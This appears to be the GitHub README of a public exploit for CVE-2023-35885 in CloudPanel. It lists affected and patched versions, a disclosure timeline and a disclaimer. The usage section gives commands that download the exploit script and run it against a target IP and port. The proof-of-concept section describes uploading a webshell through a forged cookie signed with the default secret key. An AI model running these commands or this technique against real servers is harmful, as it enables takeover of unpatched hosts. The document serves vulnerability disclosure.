Skip to content

datackmy/FallingSkies-CVE-2023-35885

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2023-35885

Cloudpanel 0-day Exploit

Author: @EagleTube, @Mzulfahmy, @farphalabs
Github : https://github.com/datackmy/FallingSkies-CVE-2023-35885/blob/main/
Affected version: v2.0.0 – v2.3.0
Patched version: v2.3.1
Vendor homepage: CloudPanel.io
Product: CloudPanel
References: https://www.datack.my/fallingskies-cloudpanel-0-day/ , [Write Up]

Usage :

wget https://raw.githubusercontent.com/datackmy/FallingSkies-CVE-2023-35885/main/exploit2.py
chmod +x exploit2.py
python3 exploit2.py -T target_ip:target_port 

DISCLAIMER

Use this script only for education purpose
We are not responsible for any damages or abusal by any third-parties or in equivalance.

PROOF OF CONCEPT

Upload webshell by inject encrypted "serialized" clp-fm cookie with default secret key.

Uploaded Shell from automated python script.

SSH user with already granted sudo privileges.

PATCH VERSION

CloudPanel v2.3.1

SPECIAL THANKS & REFERENCE

  1. Datack Sdn Bhd (full writeup) datack.my
  2. Maui sabily.info
  3. Mohamad Zulfahmy (@mzulfahmy)
  4. Farhan Phakhruddin (@farpha)

TIMELINE

01-06-2023 – Exploit Found
12-06-2023 – Privately disclose to vendor
13-06-2023 – Submitted to CVE assignee
19-06-2023 – CVE number assigned by MITRE
20-06-2023 – Patch released by the vendor (v2.3.1)
20-07-2023 – Exploit released to the public

Releases

No releases published

Packages

No packages published